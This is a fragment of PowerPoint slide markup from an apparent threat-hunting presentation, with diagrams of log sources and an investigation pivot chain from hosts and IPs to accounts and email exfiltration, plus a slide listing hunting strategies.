        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="941652" y="4734750"/>
            <a:ext cx="2352856" cy="738664"/>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Email</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noProof="0" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>Document sharing</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dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Cloud</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> services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p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3356992" y="5876185"/>
            <a:ext cx="1328328" cy="523220"/>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Event Logs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Agent Logs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3916462" y="1543539"/>
            <a:ext cx="1537716" cy="646331"/>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Adversary Information</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="11" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3703637" y="4375009"/>
            <a:ext cx="2048326" cy="11552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0" idx="0"/>
            <a:endCxn id="8" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2103437" y="4734750"/>
            <a:ext cx="5230368" cy="4224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287209" y="1879931"/>
            <a:ext cx="1600200" cy="954107"/>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Infrastructure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Capabilities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Activity</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Objectives</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="22" name="Group 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{554D3860-F626-9C56-1537-C9753CEBF6D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8382298" y="1112346"/>
            <a:ext cx="2246242" cy="370493"/>
            <a:chOff x="8382298" y="1112346"/>
            <a:chExt cx="2246242" cy="370493"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2" name="Oval 1">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31C47FF8-09F5-4FC6-AA22-84580EA4E503}"/>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1D7DA769-66B5-CCF9-2C42-4DF6C3B1B6FD}"/>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Host 1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="23" name="Group 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E790B31C-B0A8-4A11-2E8E-280D4717CC77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9608122" y="1970354"/>
            <a:ext cx="2246242" cy="370493"/>
            <a:chOff x="8382298" y="1112346"/>
            <a:chExt cx="2246242" cy="370493"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="Oval 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7FC4407-55B8-9A4C-A61E-7D6EB31537ED}"/>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621EFFCB-5C33-503E-9808-F52F208154CF}"/>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IP 1.2.3.4</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="36" name="Group 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{033AAE18-DD2E-DFA6-4DA3-221AFB628DAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8382298" y="2908482"/>
            <a:ext cx="2246242" cy="370493"/>
            <a:chOff x="8382298" y="1112346"/>
            <a:chExt cx="2246242" cy="370493"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="Oval 36">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{154C1932-1A04-7680-99FD-300A15ADFD5E}"/>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8" name="TextBox 37">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33EA2716-199F-5626-0689-CD8FF7487FD5}"/>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Host 2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="39" name="Group 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2636463-95F8-ADF4-FC2B-924DD9CBC706}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9608122" y="3766490"/>
            <a:ext cx="2246242" cy="370493"/>
            <a:chOff x="8382298" y="1112346"/>
            <a:chExt cx="2246242" cy="370493"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40" name="Oval 39">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC22A089-ECC7-95F4-2446-300D9BDDDBED}"/>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1" name="TextBox 40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1939060F-C8C8-6F8F-2AE2-2B75BFBDFFAF}"/>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Account </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="43" name="Straight Arrow Connector 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49690489-4FC4-9A1A-A888-140008C42D0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="11" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3703637" y="4341786"/>
            <a:ext cx="1919478" cy="1188492"/>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ECFE0B7-68AA-8A16-33DA-771809EB8A91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="16" idx="0"/>
            <a:endCxn id="13" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3751643" y="4388843"/>
            <a:ext cx="2044446" cy="1216255"/>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38ED105-3171-B5ED-90D6-4A3FC3552051}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="11" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3909391" y="5173662"/>
            <a:ext cx="3424414" cy="425381"/>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AAB7F64-2FC4-B51B-8B34-2DED861D4D9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="18" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2118080" y="4734750"/>
            <a:ext cx="5097228" cy="335191"/>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CBC78FC-1959-A246-4761-37D5171910CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="20" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2051950" y="2189870"/>
            <a:ext cx="2633370" cy="2510146"/>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F3E52F5F-DAE0-C478-71E7-DC070FF3E569}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3348110" y="5060006"/>
            <a:ext cx="361410" cy="643087"/>
            <a:chOff x="917425" y="2212848"/>
            <a:chExt cx="361410" cy="643087"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="61" name="Wave 60">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54F0D0BE-8C7F-DD01-0E34-D44311425C88}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="923294" y="2212848"/>
              <a:ext cx="355541" cy="285187"/>
            </a:xfrm>
            <a:prstGeom prst="wav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3ED9C324-31C5-3447-45B5-F0FD0CBD4EC9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:stCxn id="61" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="917425" y="2355442"/>
              <a:ext cx="5869" cy="500493"/>
            </a:xfrm>
            <a:prstGeom prst="line">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E81DB6C6-0848-C985-FCAF-F3CC65F1FCC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8382298" y="4519371"/>
            <a:ext cx="2246242" cy="370493"/>
            <a:chOff x="8382298" y="1112346"/>
            <a:chExt cx="2246242" cy="370493"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="67" name="Oval 66">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20E1E559-30C3-4339-6757-9C53F1164A55}"/>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 name="TextBox 67">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83F4C48E-971F-36C1-1485-DBEEF0191017}"/>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Email Exfil</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="69" name="Group 68">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B536692F-4597-8685-BD1A-36FD13CB3E99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9608122" y="5377379"/>
            <a:ext cx="2246242" cy="646911"/>
            <a:chOff x="8382298" y="1112346"/>
            <a:chExt cx="2246242" cy="646911"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="70" name="Oval 69">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EEF8788-DF47-BA40-3B1F-738EF9B27AC3}"/>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C104F9F3-B1F3-BDA0-1401-B939EF07F57B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8866001" y="1143704"/>
              <a:ext cx="1762539" cy="615553"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t>Adversary</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t>Objective</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="73" name="Straight Arrow Connector 72">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BF5DED2-6316-BD03-F97B-334DE0E078E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="2" idx="5"/>
            <a:endCxn id="25" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8698534" y="1428582"/>
            <a:ext cx="963845" cy="5960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51ED38-5548-9F11-3ECE-F26BCA776EF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="25" idx="3"/>
            <a:endCxn id="37" idx="7"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8698534" y="2286590"/>
            <a:ext cx="963845" cy="67614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BE9A6D2-7826-203C-9475-7110A8CD2ABD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="37" idx="5"/>
            <a:endCxn id="40" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8698534" y="3224718"/>
            <a:ext cx="963845" cy="5960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6C495-FF08-DE11-ADEF-726858B02834}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="40" idx="3"/>
            <a:endCxn id="67" idx="7"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8698534" y="4082726"/>
            <a:ext cx="963845" cy="490902"/>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4527E61-7024-7CA5-5F59-2AEF706233FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="67" idx="5"/>
            <a:endCxn id="70" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8698534" y="4835607"/>
            <a:ext cx="963845" cy="5960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E0226A3-6E70-F8CE-6D1D-0A6A2F839ECF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="245981" y="6530400"/>
            <a:ext cx="12056086" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>One of the most valuable tools you can build is a pivoting library that understands your data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="175842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p:cTn id="39" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="64"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="64"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6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par>
                                <p:cTn id="50" presetID="10"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par>
                                <p:cTn id="53" presetID="10"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right)">
                                      <p:cBhvr>
                                        <p:cTn id="60" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="46"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="61" presetID="10"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wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="71" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="50"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="72" presetID="10" presetClass="entr" presetSubtype="0" fill="hold"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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="77"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="75" presetID="10"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right)">
                                      <p:cBhvr>
                                        <p:cTn id="82" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="54"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="83" presetID="10" presetClass="entr" presetSubtype="0" fill="hold"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fade">
                                      <p:cBhvr>
                                        <p:cTn id="85" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="81"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="86" presetID="10" presetClass="entr" presetSubtype="0"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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="93" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="57"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="94" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="with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E35EB-B3ED-44F6-A55F-40023145D42B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Strategies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9FCB0D5-AC85-EA17-4AEC-562580DFB2A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5040983" y="2671571"/>
            <a:ext cx="7069054" cy="1648143"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Zoom Out to widen the field of vision</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Time Travel Breach Detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hunting until Closure of the Pivoting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20681004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ppliance, air conditioner&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB9370FA-FF0E-4C02-AECE-C073654AE804}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect t="19403"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3892852" y="3872749"/>
            <a:ext cx="4799021" cy="2740382"/>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DD0FED89-B3AF-416C-B53E-2CBB291D28B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="5765" r="27882"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2845388" y="3561883"/>
            <a:ext cx="1289187" cy="1952638"/>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97ECB8CD-82FF-4CCD-8BB0-E2B0C97A1709}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="5765" r="27882"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8505010" y="3872750"/>
            <a:ext cx="1289187" cy="1952638"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9" descr="Chart&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1E59A7C-1B7C-4D49-819E-6CD1B2B4F1FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4186005" y="2201834"/>
            <a:ext cx="4468724" cy="1670914"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11" descr="A picture containing text, clipart, sign&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02BC45FD-3507-4DAA-9033-A696A7F8E4B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5624626" y="5869963"/>
            <a:ext cx="1719487" cy="495446"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F4EB9D6-BAF2-4697-9C50-A73806C0E69D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4134575" y="3872748"/>
            <a:ext cx="4370435" cy="284610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TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
